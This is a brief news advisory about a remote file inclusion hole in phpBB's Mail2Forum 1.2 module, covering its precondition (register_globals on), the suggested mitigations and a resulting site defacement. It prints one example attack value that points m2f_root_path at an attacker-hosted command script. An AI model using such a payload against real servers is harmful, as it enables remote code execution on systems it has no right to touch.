Critical Holes in Module for phpBB Forum Software
An exploit has surfaced for the Mail2Forum module of the popular phpBB forum software, potentially allowing attackers to compromise the system. The problem is caused by an incorrect processing of the m2f_root_path parameter in scripts like m2f_forum.php, m2f_mailinglist.php, and others. Hackers can potentially use the exploit to execute any PHP code desired. This means an attacker could reroute the m2f_root_path to his own server (m2f_root_path=http://[server]/cmd.txt?&cmd=ls) and then execute malicious code on the vulnerable phpBB server. As always, the hole can only be exploited if the register_globals option is active. Mail2Forum version 1.2 is reported to be affected. No official patch has been provided as yet. Users are instructed to turn off register_globals or edit the source code of the module themselves.
According to those who maintain the server, this hole was the source of the defacement of www.phpBB2.de, the official website for German support of phpBB2. As of Tuesday morning, visitors to the site's welcome page received only the message "THES SIT HACKED". Although the vulnerable module wasn't used actively on the server it was in a subdirectory, and reachable from the outside.